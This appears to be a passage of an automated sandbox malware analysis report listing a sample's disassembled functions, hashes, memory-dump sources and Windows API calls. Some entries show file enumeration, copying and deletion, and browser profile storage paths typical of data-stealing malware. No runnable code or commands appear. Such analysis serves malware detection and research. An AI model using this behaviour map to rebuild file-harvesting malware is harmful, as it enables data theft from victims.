                              • Instruction ID: f7068a293dbb6c455a7ed9be0203589b872f10388572b0dc4aa6c67443c69866
                              • Opcode Fuzzy Hash: 01235e5a9275b817919772c71eeb8180e98a2e677f41effcd8e39843c0a77568
                              • Instruction Fuzzy Hash: 215125F3A086045BE748AE2EDC8573BFBE6EBD4710F1A893DD7C583380D93858058686
                              Function 0092CD04 Relevance: 1.4, Strings: 1, Instructions: 172COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: Zrj~
                              • API String ID: 0-4197340146
                              • Opcode ID: 76d6a4bc13d9eaf845a31ab2181398569097259e5ab6c3cd7085c6c2425082be
                              • Instruction ID: 9dbb1168f1ee5d49d33aa9f855bcd098b384e5273b8ab7f7d39650a8e2d990e1
                              • Opcode Fuzzy Hash: 76d6a4bc13d9eaf845a31ab2181398569097259e5ab6c3cd7085c6c2425082be
                              • Instruction Fuzzy Hash: 6F510BB3A082045FE314AE3EDC8572BFBE7EBD4310F16863DE6D883744E93569068656
                              Function 008CD1D3 Relevance: 1.4, Strings: 1, Instructions: 166COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: qmC
                              • API String ID: 0-4005487783
                              • Opcode ID: 2c29fc39c8fdd05c0dba8904b60cd3387a222bc337759aef1a5bc5220b198b8f
                              • Instruction ID: c6ccb59665bc5312164397fe55ac3c6c7dbcb7fb3cb98227ef21b8ce6add0ddf
                              • Opcode Fuzzy Hash: 2c29fc39c8fdd05c0dba8904b60cd3387a222bc337759aef1a5bc5220b198b8f
                              • Instruction Fuzzy Hash: 01416BF7B082105FF3109D2DECC5BBB77E9DB94320F198639EA84D3744E97A98058296
                              Function 007F336B Relevance: .2, Instructions: 209COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 9c2c3880f3fb3e5adc4dcc60f177d30f1a3aefb9642eaec78d7502dc76749087
                              • Instruction ID: df788bf0888f2d75c582eca5e192d53c8fa92c16023419de74f761b259259624
                              • Opcode Fuzzy Hash: 9c2c3880f3fb3e5adc4dcc60f177d30f1a3aefb9642eaec78d7502dc76749087
                              • Instruction Fuzzy Hash: C2513DF3A483089BE3009E6DECC0766F7DAEF94614F6A813CDA84D3744F57A69058297
                              Function 00821D4C Relevance: .2, Instructions: 208COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 796b4b91c18282edec26cf85ae6e2adfd9cc496d4d79ce656db4edd5afc9d758
                              • Instruction ID: f93d85db9a571d7614897d7e53ef419e004270f0894f177c035c8e5ed4d19de9
                              • Opcode Fuzzy Hash: 796b4b91c18282edec26cf85ae6e2adfd9cc496d4d79ce656db4edd5afc9d758
                              • Instruction Fuzzy Hash: 2F613AF3E082109FE3046E2DDC8577ABBD5EB94310F1A4A3DEAC4D3784E97998158792
                              Function 00890948 Relevance: .2, Instructions: 165COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 508183b1661ff9744572721254116aa8fb938ca4d9fa0fcd2b026d6846324381
                              • Instruction ID: e234c1d32996114c36e29e5e75dc425757174ee98700ec045f2e9f9477986eaa
                              • Opcode Fuzzy Hash: 508183b1661ff9744572721254116aa8fb938ca4d9fa0fcd2b026d6846324381
                              • Instruction Fuzzy Hash: F25113B3E082145BE3046E3CDC4537AB7D2EF80710F1A893CD9C9D7784E978A9458786
                              Function 0086AB5D Relevance: .2, Instructions: 153COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e546507366895132f662f3d6dfe89788d625683aa69f46190670f0a49b3bd103
                              • Instruction ID: fde802bcf6469446606c45d0888284fc19e02872cddbb68db09d292ec48bbc6f
                              • Opcode Fuzzy Hash: e546507366895132f662f3d6dfe89788d625683aa69f46190670f0a49b3bd103
                              • Instruction Fuzzy Hash: 9151F6B3E092209FE3549E28DC84776B7D6DF84320F1B853DEA849B784EA795C0187C6
                              Function 005A8640 Relevance: 69.5, APIs: 45, Strings: 1, Instructions: 451stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(00000000), ref: 005A86C7
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A86FF
                              • lstrcpy.KERNEL32(?,00000000), ref: 005A873C
                              • StrStrA.SHLWAPI(?,0160E5C8), ref: 005A8761
                              • lstrcpyn.KERNEL32(007C93D0,?,00000000), ref: 005A8780
                              • lstrlen.KERNEL32(?), ref: 005A8793
                              • wsprintfA.USER32 ref: 005A87A3
                              • lstrcpy.KERNEL32(?,?), ref: 005A87B9
                              • StrStrA.SHLWAPI(?,0160E5E0), ref: 005A87E6
                              • lstrcpy.KERNEL32(?,007C93D0), ref: 005A8846
                              • StrStrA.SHLWAPI(?,0160E5F8), ref: 005A8873
                              • lstrcpyn.KERNEL32(007C93D0,?,00000000), ref: 005A8892
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcpynlstrlen$wsprintf
                              • String ID: %s%s
                              • API String ID: 2672039231-3252725368
                              • Opcode ID: 33a9fc2a7610865ca48aa3c2643f4f38ba25c2218142ffea1a38b7a1cf543fea
                              • Instruction ID: a3d5a8429d6af8478575f1451cc725412869e5f069262d83390423b0a3a65283
                              • Opcode Fuzzy Hash: 33a9fc2a7610865ca48aa3c2643f4f38ba25c2218142ffea1a38b7a1cf543fea
                              • Instruction Fuzzy Hash: 4F025E72901119EFCB50DB64DD5CEEEBBB9FF48300F14815DEA09A7250DB38AE418BA5
                              Function 00591E79 Relevance: 54.4, APIs: 36, Instructions: 407stringfileCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 00591E9F
                              • lstrlen.KERNEL32(016095F8), ref: 00591EAE
                              • lstrcpy.KERNEL32(00000000,?), ref: 00591EDB
                              • lstrcat.KERNEL32(00000000,?), ref: 00591EE3
                              • lstrlen.KERNEL32(005C1D5C), ref: 00591EEE
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00591F0E
                              • lstrcat.KERNEL32(00000000,005C1D5C), ref: 00591F1A
                              • lstrcpy.KERNEL32(00000000,?), ref: 00591F42
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00591F4D
                              • lstrlen.KERNEL32(005C1D5C), ref: 00591F58
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00591F75
                              • lstrcat.KERNEL32(00000000,005C1D5C), ref: 00591F81
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00591FAC
                              • lstrlen.KERNEL32(?), ref: 00591FE4
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00592004
                              • lstrcat.KERNEL32(00000000,?), ref: 00592012
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00592039
                              • lstrlen.KERNEL32(005C1D5C), ref: 0059204B
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0059206B
                              • lstrcat.KERNEL32(00000000,005C1D5C), ref: 00592077
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0059209D
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005920A8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005920D4
                              • lstrlen.KERNEL32(?), ref: 005920EA
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0059210A
                              • lstrcat.KERNEL32(00000000,?), ref: 00592118
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00592142
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 0059217F
                              • lstrlen.KERNEL32(0160DAC8), ref: 0059218D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005921B1
                              • lstrcat.KERNEL32(00000000,0160DAC8), ref: 005921B9
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005921F7
                              • lstrcat.KERNEL32(00000000), ref: 00592204
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0059222D
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00592256
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00592282
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005922BF
                              • DeleteFileA.KERNEL32(00000000), ref: 005922F7
                              • FindNextFileA.KERNEL32(00000000,?), ref: 00592344
                              • FindClose.KERNEL32(00000000), ref: 00592353
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                              • String ID:
                              • API String ID: 2857443207-0
                              • Opcode ID: 0a23d949791f17f3356279610d5be09545e296e9ece3349725943c4f7a392bb3
                              • Instruction ID: d5aa43f3de175be0d67f8283ae03c46cdfdeed21b3976b87240b1e287cc7c1b0
                              • Opcode Fuzzy Hash: 0a23d949791f17f3356279610d5be09545e296e9ece3349725943c4f7a392bb3
                              • Instruction Fuzzy Hash: D8E11B71A1261BABCF10EFA4DD8DAAE7FB9BF44700F044168F905A7211DB34ED458BA4
                              Function 005A68A0 Relevance: 52.9, APIs: 29, Strings: 1, Instructions: 437stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005A68D5
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005A6910
                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 005A693A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A6971
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A6996
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005A699E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A69C7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FolderPathlstrcat
                              • String ID: \..\
                              • API String ID: 2938889746-4220915743
                              • Opcode ID: 9a24fc46925e8415b79a119195273d49fcf79af1e005db9b99eccda376b9d2fc
                              • Instruction ID: 3c1eed1e8ace6336e5658bbcfc59cbe5154819cced44accbfde7e18ee7814794
                              • Opcode Fuzzy Hash: 9a24fc46925e8415b79a119195273d49fcf79af1e005db9b99eccda376b9d2fc
                              • Instruction Fuzzy Hash: 4CF17F70E1121AAFDB21AF74C84DAAE7FB4BF85700F088128E955D7261DB38DD45CBA1
                              Function 005A4720 Relevance: 49.3, APIs: 26, Strings: 2, Instructions: 334stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005A4753
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005A4786
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A47AE
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005A47B9
                              • lstrlen.KERNEL32(\storage\default\), ref: 005A47C4
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A47E1
                              • lstrcat.KERNEL32(00000000,\storage\default\), ref: 005A47ED
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A4816
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005A4821
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A4848
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A4887
                              • lstrcat.KERNEL32(00000000,?), ref: 005A488F
                              • lstrlen.KERNEL32(005C1D5C), ref: 005A489A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A48B7
                              • lstrcat.KERNEL32(00000000,005C1D5C), ref: 005A48C3
                              • lstrlen.KERNEL32(.metadata-v2), ref: 005A48CE
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A48EB
                              • lstrcat.KERNEL32(00000000,.metadata-v2), ref: 005A48F7
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A491E
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A4950
                              • GetFileAttributesA.KERNEL32(00000000), ref: 005A4957
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A49B1
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A49DA
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A4A03
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A4A2B
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005A4A5F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
